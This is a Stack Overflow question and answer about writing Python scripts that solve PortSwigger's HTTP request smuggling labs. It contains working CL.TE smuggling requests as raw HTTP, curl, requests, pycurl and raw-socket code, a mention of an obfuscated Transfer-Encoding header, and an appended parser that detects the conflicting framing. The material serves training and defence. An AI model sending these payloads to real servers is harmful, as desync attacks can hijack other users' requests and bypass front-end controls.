Recently I have been working through PortSwigger's WebSecAcademy HTTP request smuggling labs, with the extra challenge of writing Python scripts to solve them for me.

The expected solution from Burp Repeater:
```http
POST / HTTP/1.1
Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 8
Transfer-Encoding: chunked

0

G
```

If you right-click and choose "Copy as curl command":
```bash
curl -i -s -k -X $'POST' \
-H $'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 8' \
--data-binary $'0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \
$'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
```

When I try to run this with curl, it returns a 500 Internal Server Error.
I have managed to get it working with the Python requests module:

```python
import requests

def POST_CLTE():
    url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
    headers = {'Host': 'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
               'Connection': 'keep-alive',
               'Content-Type': 'application/x-www-form-urlencoded',
               'Content-Length': '8',
               'Transfer-Encoding': 'chunked'}
    # 8-byte body: a terminating "0" chunk followed by the stray "G"
    data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'
    s = requests.Session()
    # build and prepare the request by hand instead of calling requests.post()
    r = requests.Request('POST', url, headers=headers, data=data)
    prepared = r.prepare()
    response = s.send(prepared)
    print(response.request.headers)
    print(response.status_code)
    print(response.text)
```

But I don't like that I have to pass the headers as a dict, and it throws an error when I want to include an obfuscated header such as `X: X[\n]Transfer-Encoding: chunked`. I tried reproducing the request with PyCurl:
```python
#!/usr/bin/python
import pycurl
from io import BytesIO  # works on Python 2 and 3 (pycurl needs a bytes buffer on 3)

buffer = BytesIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/')
c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a')
#c.setopt(pycurl.POSTFIELDSIZE, 8)
# headers are passed as a plain list of strings, so arbitrary header lines are possible
c.setopt(c.HTTPHEADER, [
    'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
    'Content-Length: 8',
    'Transfer-Encoding: chunked',
    'Content-Type: application/x-www-form-urlencoded'
])
#c.setopt(c.CRLF, 1)
c.setopt(c.VERBOSE, 1)    # dump the exchange to stderr
c.setopt(c.HEADER, 1)     # include response headers in the captured body
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()
body = buffer.getvalue()
print(body)
```

I like that I can pass the headers as an array of strings, but unfortunately I still get a 500 Internal Server Error:
```text
* Trying 18.200.141.238:443...
* TCP_NODELAY set
* Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)
* found 387 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
* server certificate verification OK
* server certificate status verification SKIPPED
* common name: web-security-academy.net (matched)
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: CN=web-security-academy.net
* start date: Fri, 05 Jul 2019 00:00:00 GMT
* expire date: Wed, 05 Aug 2020 12:00:00 GMT
* issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon
* ALPN, server did not agree to a protocol
> POST / HTTP/1.1
Host: ac561fd21ed819768081009200f2002e.web-security-academy.net
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 8
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
8
* upload completely sent off: 15 out of 8 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 Internal Server Error
< Content-Type: application/json; charset=utf-8
< Connection: close
< Content-Length: 23
<
* Closing connection 0
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 23
"Internal Server Error"
```

What is the reason for this behaviour? Are there any alternatives I haven't explored? Any suggestions are much appreciated.

Posted on 2020-05-23 10:44:22
The socket module works fine for me. I feel a bit silly for not having tried it, but I learned a lot.

Code:

```python
import socket
import ssl

host = 'lab-id.web-security-academy.net'
port = 443

message = "POST / HTTP/1.1\r\n"
hostHeader = "Host: lab-id.web-security-academy.net\r\n"
contentLength = "Content-Length: 8\r\n"
transferEncoding = "Transfer-Encoding: chunked\r\n"
contentType = "Content-Type: application/x-www-form-urlencoded\r\n"
requestBody = "0\r\n\r\nG\r\n"
# the request is assembled by hand, so both framing headers go out exactly as written
finalMessage = message + hostHeader + contentLength + transferEncoding + contentType + "\r\n" + requestBody

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# ssl.wrap_socket() is deprecated (removed in Python 3.12); a default context does the same job
context = ssl.create_default_context()
sslWrappedSock = context.wrap_socket(sock, server_hostname=host)
sslWrappedSock.connect((host, port))
sslWrappedSock.sendall(finalMessage.encode())  # sockets take bytes, not str
print(sslWrappedSock.recv(1024))
sslWrappedSock.close()
```

https://stackoverflow.com/questions/62156976
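Added example, not from the question or the answer: the same request seen from the front-end's side. It parses the CL.TE request that the socket answer sends (constructed inline; `lab-id` is a placeholder), lists the reasons an RFC 7230 section 3.3.3 compliant gateway must reject it, and shows that Content-Length and chunked framing disagree about where the request ends, which is the desync the lab is about; the CR/LF check is what catches the `X: X\nTransfer-Encoding: chunked` style header the question mentions.

```python
# Constructed sample (not captured traffic): the CL.TE request as the socket answer writes it.
SMUGGLING_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: lab-id.web-security-academy.net\r\n"
    b"Content-Length: 8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\nG\r\n"          # 8 bytes: a terminating chunk, then a stray "G"
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = [(n.strip().lower(), v.strip()) for n, _, v in (l.partition(b":") for l in lines[1:])]
    return lines[0], headers, body

def framing_problems(raw):
    """Reasons an RFC 7230 (section 3.3.3) front-end should reject the request."""
    _, headers, _ = parse_request(raw)
    cl = [v for n, v in headers if n == b"content-length"]
    te = [v for n, v in headers if n == b"transfer-encoding"]
    problems = []
    if cl and te:
        problems.append("Content-Length and Transfer-Encoding both present")
    if len(set(cl)) > 1 or any(not v.isdigit() for v in cl):
        problems.append("Content-Length duplicated or non-numeric")
    if any(b"\n" in n + v or b"\r" in n + v for n, v in headers):
        problems.append("bare CR/LF inside a header (hidden second header)")
    return problems

def split_by_content_length(raw):
    """Where a Content-Length parser thinks the request ends: (body, leftover bytes)."""
    _, headers, body = parse_request(raw)
    n = int(next(v for k, v in headers if k == b"content-length"))
    return body[:n], body[n:]

def split_by_chunked(raw):
    """Where a chunked parser thinks the request ends: (decoded body, leftover bytes)."""
    _, _, body = parse_request(raw)
    decoded, pos = b"", 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # chunk-size, ignoring extensions
        pos = eol + 2
        if size == 0:                                   # last-chunk, then empty trailer + CRLF
            return decoded, body[body.index(b"\r\n", pos) + 2:]
        decoded += body[pos:pos + size]
        pos += size + 2                                 # chunk data plus its CRLF
```

The curl log above, with its `8` chunk-size line and "15 out of 8 bytes", shows libcurl chunk-encoding the body itself once it sees the custom Transfer-Encoding header, which is why the ambiguous request only goes out unchanged from a raw socket as in the answer. Under Content-Length the whole 8-byte body belongs to this request; under chunked framing the request ends after the `0` chunk and `G\r\n` is left waiting as the start of the next one.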